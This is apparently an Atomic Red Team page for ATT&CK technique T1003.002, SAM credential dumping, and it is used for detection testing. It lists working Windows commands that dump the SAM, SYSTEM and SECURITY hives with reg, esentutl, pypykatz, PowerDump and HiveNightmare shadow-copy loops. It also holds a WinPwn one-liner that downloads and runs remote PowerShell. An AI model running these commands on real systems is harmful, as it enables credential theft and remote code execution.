T1003.002
OS Credential Dumping: Security Account Manager
Description from ATT&CK
Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
Alternatively, the SAM can be extracted from the Registry with Reg:
- reg save HKLM\sam sam
- reg save HKLM\system system
Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
Notes:
- RID 500 account is the local, built-in administrator.
- RID 501 is the guest account.
- User accounts start with a RID of 1,000+.
Atomic Tests
Atomic Test #1 - Registry dump of SAM, creds, and secrets
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
Supported Platforms: windows
auto_generated_guid: 5c2571d0-1572-416d-9676-812e64ca9f44
Inputs:
None
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
2
3
4
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
Cleanup Commands:
1
2
3
4
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
Atomic Test #2 - Registry parse with pypykatz
Parses registry hives to obtain stored credentials
Supported Platforms: windows
auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263
Inputs:
None
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
2
pypykatz live registry
Dependencies: Run with command_prompt!
Description: Computer must have python 3 installed
Check Prereq Commands:
1
2
3
py -3 --version >nul 2>&1
exit /b %errorlevel%
Get Prereq Commands:
1
2
echo "Python 3 must be installed manually"
Description: Computer must have pip installed
Check Prereq Commands:
1
2
3
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
Get Prereq Commands:
1
2
echo "PIP must be installed manually"
Description: pypykatz must be installed and part of PATH
Check Prereq Commands:
1
2
3
pypykatz -h >nul 2>&1
exit /b %errorlevel%
Get Prereq Commands:
1
2
pip install pypykatz
Atomic Test #3 - esentutl.exe SAM copy
Copy the SAM hive using the esentutl.exe utility This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
Supported Platforms: windows
auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
file_path | Path to the file to copy | path | %SystemRoot%/system32/config/SAM |
file_name | Name of the copied file | string | SAM |
copy_dest | Destination of the copied file | string | %temp% |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
2
esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
Cleanup Commands:
1
2
del #{copy_dest}\#{file_name} >nul 2>&1
Atomic Test #4 - PowerDump Hashes and Usernames from Registry
Executes a hashdump by reading the hashes from the registry.
Supported Platforms: windows
auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Invoke-PowerDump
Dependencies: Run with powershell!
Description: PowerDump script must exist on disk at specified location Check Prereq Commands:
1
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1") {exit 0} else {exit 1}
Get Prereq Commands:
1
2
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Atomic Test #5 - dump volume shadow copy hives with certutil
Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM". This can be done with a non-admin user account. CVE-2021-36934
Supported Platforms: windows
auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
target_hive | Hive you wish to dump | string | SAM |
limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10 |
Attack Commands: Run with command_prompt!
1
2
for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) && dir /B %temp%\#{target_hive}vss%a
Cleanup Commands:
1
2
for /L %a in (1,1,#{limit}) do @(del %temp%\#{target_hive}vss%a >nul 2>&1)
Atomic Test #6 - dump volume shadow copy hives with System.IO.File
Dump hives from volume shadow copies with System.IO.File. CVE-2021-36934
Supported Platforms: windows
auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
target_hive | Hive you wish to dump | string | SAM |
limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10 |
Attack Commands: Run with powershell!
1
2
3
4
5
1..#{limit} | % {
try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\#{target_hive}" , "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
Cleanup Commands:
1
2
3
4
1..#{limit} | % {
rm "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn
Supported Platforms: windows
auto_generated_guid: 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb
Inputs:
None
Attack Commands: Run with powershell!
1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive